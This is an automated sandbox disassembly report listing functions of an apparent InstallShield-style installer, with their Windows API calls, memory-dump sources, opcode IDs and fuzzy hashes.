                                                                                                                                                                          Function 0045D0FC, Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageMultipleObjectsPeekWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3986374578-0
                                                                                                                                                                          • Opcode ID: 676a96eb342a266fcfc4a7ce849cde8eec9497f8f7576232b13238fabb5e0587
                                                                                                                                                                          • Instruction ID: 542437937e693448d60f790d74c7852ae23aee9b21908bde08184ad7d3a19a40
                                                                                                                                                                          • Opcode Fuzzy Hash: 676a96eb342a266fcfc4a7ce849cde8eec9497f8f7576232b13238fabb5e0587
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF03AB290060EBFDB10DFE4CC89DAB37ADEB04345F008026FA19DA151E379D9498B28
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F694, Relevance: 6.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0043F6CD
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0043F6DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3428934214-0
                                                                                                                                                                          • Opcode ID: 17fe073695f75e869942cbf363d5995e6be7469ad328acd972bd53ecb49adafd
                                                                                                                                                                          • Instruction ID: a0fd47fb42ccfc6d0ec60abcec66be1cc4bcd0456df143a0f6ca570c24c75dbb
                                                                                                                                                                          • Opcode Fuzzy Hash: 17fe073695f75e869942cbf363d5995e6be7469ad328acd972bd53ecb49adafd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FF09032801A25AB8B217FA09C06CEB776CEF0A314B01546BF945D3161E7246A8687ED
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E467, Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32 ref: 0041E470
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041E489
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 0041E499
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000402,?,00000000), ref: 0041E4B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$ItemWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 591194657-0
                                                                                                                                                                          • Opcode ID: 658b5a24fe667039d47aa5bea26469ae3c1b8fa75b7d9059acd01f7a5e4f9c5a
                                                                                                                                                                          • Instruction ID: 086c65dd2a8fd86eb96c83d516be3b508d86709e954b7f21f5627c47faf4bd84
                                                                                                                                                                          • Opcode Fuzzy Hash: 658b5a24fe667039d47aa5bea26469ae3c1b8fa75b7d9059acd01f7a5e4f9c5a
                                                                                                                                                                          • Instruction Fuzzy Hash: CAF08235240224BBD7101B66EC09EEA7F6EDB45BA1F414036FA0CE65A1CB7958818AAC
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440A98, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00440A9F
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00440AD8
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(0000000A), ref: 00440AE1
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00440AEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Mode$DirectoryH_prolog3_Remove
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 359717666-0
                                                                                                                                                                          • Opcode ID: 1deef27381a6c93ade2629717b38e1d02ab6f37601ba07bd2aac61d635b22692
                                                                                                                                                                          • Instruction ID: 3d0c8204a6a153228ac0b284ba3dea058747ce1289a2eec28a53cc0a46413047
                                                                                                                                                                          • Opcode Fuzzy Hash: 1deef27381a6c93ade2629717b38e1d02ab6f37601ba07bd2aac61d635b22692
                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0E9B1A00304ABEB40BFB08D4A77D3B65AF40305F00816BF919A91E2DF758A559759
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401580, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3822639702-0
                                                                                                                                                                          • Opcode ID: d366ffdce4c3edae2fd1804eae267c2211bc30a5108d234b26a8eb6ae91b3288
                                                                                                                                                                          • Instruction ID: 9a005d60021f5feac5fdb6272902ef105e2fb40344eb9eba5d1b87e231f33d89
                                                                                                                                                                          • Opcode Fuzzy Hash: d366ffdce4c3edae2fd1804eae267c2211bc30a5108d234b26a8eb6ae91b3288
                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0F935400A12EFD7009F19E948940BBB1FF48319715823AE40C97A31C775F9A4CFC4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F9A2, Relevance: 6.0, APIs: 4, Instructions: 27fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNEL32(00008001,00000000,?,00440B46,0000000A), ref: 0043F9AB
                                                                                                                                                                          • CreateFileW.KERNEL32(00440B46,80000000,00000000,00000000,00000003,00000080,00000000,?,00440B46,0000000A), ref: 0043F9C5
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9D1
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00440B46,0000000A), ref: 0043F9DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$CloseCreateFileHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1343785229-0
                                                                                                                                                                          • Opcode ID: 3b850a914fe9f9b39da48f75a18da2051ba3526db85358e7479b2d52dc44fb68
                                                                                                                                                                          • Instruction ID: ed0d5c47bd51f109477fc0e304e87e3cfec28a73d1f9b23fc43539f9b5c9113a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b850a914fe9f9b39da48f75a18da2051ba3526db85358e7479b2d52dc44fb68
                                                                                                                                                                          • Instruction Fuzzy Hash: 07E04FB15406807BD6602B72AC0DF1B3E6EEBCAB21F920A35F219E44E1CA245486D668
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041B93A, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,hide_progress), ref: 0041B946
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,hide_splash,?,hide_progress), ref: 0041B959
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                          • String ID: hide_progress$hide_splash
                                                                                                                                                                          • API String ID: 1586166983-450596345
                                                                                                                                                                          • Opcode ID: 61b985570fd18731df1cd59468a8c6fd1507b00a5b15ef9586131a75bb3e179c
                                                                                                                                                                          • Instruction ID: 661bc82a2d12719fcc1ec0ca29b5a91ad18437f56b7443bb46b4a1dad1c0b522
                                                                                                                                                                          • Opcode Fuzzy Hash: 61b985570fd18731df1cd59468a8c6fd1507b00a5b15ef9586131a75bb3e179c
                                                                                                                                                                          • Instruction Fuzzy Hash: 00E0D830358F53E5C71097748CD87DD67016F11348F50426AE02A621D1D7ACC98696DD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041D747, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                          • API String ID: 2427045233-4289949731
                                                                                                                                                                          • Opcode ID: f3849ba1738b1d9c1c1a11addbc053a3da717460b735f54e32d7c49fceaa61d1
                                                                                                                                                                          • Instruction ID: f2f0c8a3fa999fadd7c805550d79f5c883fdd4f26c532e5801715968544a6183
                                                                                                                                                                          • Opcode Fuzzy Hash: f3849ba1738b1d9c1c1a11addbc053a3da717460b735f54e32d7c49fceaa61d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FB19EB1E00218AFDB24DF68C881BDDB7B4AF54314F2045AFE495A72D1DBB89AC4CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040DD08, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 273fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040DD12
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DD47
                                                                                                                                                                            • Part of subcall function 0040E275: WriteFile.KERNEL32(?,00000008,00000000,?,00000000,00000000,?,0040DDAB,00000000,?,?,00000000,00000001,0000FEFF), ref: 0040E297
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateH_prolog3_Write
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 925660288-3462329250
                                                                                                                                                                          • Opcode ID: 88386ccbe3407b0f9cd390b029bcba5f0f870708a6ff11bacba052a2f1e145e6
                                                                                                                                                                          • Instruction ID: b9a0e95bb5147aa44aa4453cb5ad653d7f6ac383e32e4ac6088c0f16e4f41e64
                                                                                                                                                                          • Opcode Fuzzy Hash: 88386ccbe3407b0f9cd390b029bcba5f0f870708a6ff11bacba052a2f1e145e6
                                                                                                                                                                          • Instruction Fuzzy Hash: B6B18071D00258EEDB14DBA5CC85BDEBBB8EF14304F1484AEE149B7181EB742A85CF64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043A5ED, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043A5F7
                                                                                                                                                                            • Part of subcall function 0043A8D9: __EH_prolog3_GS.LIBCMT ref: 0043A8E0
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$H_prolog3
                                                                                                                                                                          • String ID: %20$file://
                                                                                                                                                                          • API String ID: 3952504126-2765206336
                                                                                                                                                                          • Opcode ID: 1e61cce4cd5163f6bf5badc2fb668c9a329ffd05dab251ec4727f5b8ad8166fd
                                                                                                                                                                          • Instruction ID: 77530b1a0ea786f010cde3bedfc995ad4c899f8c34f7510d0c1b3be72dc6b4e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1e61cce4cd5163f6bf5badc2fb668c9a329ffd05dab251ec4727f5b8ad8166fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 23617C71A10218EADB10EB94CC91BEEB3B8BB55308F1040AEF445A7191DB785E49CB6A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041FB90, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041FB9A
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00435F95: __EH_prolog3_GS.LIBCMT ref: 00435F9F
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: HsG$Startup
                                                                                                                                                                          • API String ID: 2608676048-1810023339
                                                                                                                                                                          • Opcode ID: 63d44a97fdc39e9bc521022a19b9c7a99b0b530f33bd61a85936d9ba7cb41176
                                                                                                                                                                          • Instruction ID: ed0ca79c93aab8b746b19ee7c433889b8f240a6747215bc3ba99250dd31ddd9f
                                                                                                                                                                          • Opcode Fuzzy Hash: 63d44a97fdc39e9bc521022a19b9c7a99b0b530f33bd61a85936d9ba7cb41176
                                                                                                                                                                          • Instruction Fuzzy Hash: E3518E31900158EADB24EBA0CC55BEEB778AF11304F1440AFF405B71D1EBB86E49CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456AC2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00456AC9
                                                                                                                                                                          • CompareFileTime.KERNEL32(?,00000000,?,?,PSTORES.EXE,00000000,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 00456C21
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareFileH_prolog3Time
                                                                                                                                                                          • String ID: PSTORES.EXE
                                                                                                                                                                          • API String ID: 2703394530-1209905799
                                                                                                                                                                          • Opcode ID: 477db7b0db3111e4d7269be3169a4e76faa47bea44aba997b6f9e44252915542
                                                                                                                                                                          • Instruction ID: 5a71753b2c1fd2e151c32cf2da638348be322b85b85c0d0e990e6a69628b7215
                                                                                                                                                                          • Opcode Fuzzy Hash: 477db7b0db3111e4d7269be3169a4e76faa47bea44aba997b6f9e44252915542
                                                                                                                                                                          • Instruction Fuzzy Hash: 48511272C00159AACF11DF94C8909EEBB78EF08315F95415BE941B7242EB38AA49CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404E50, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
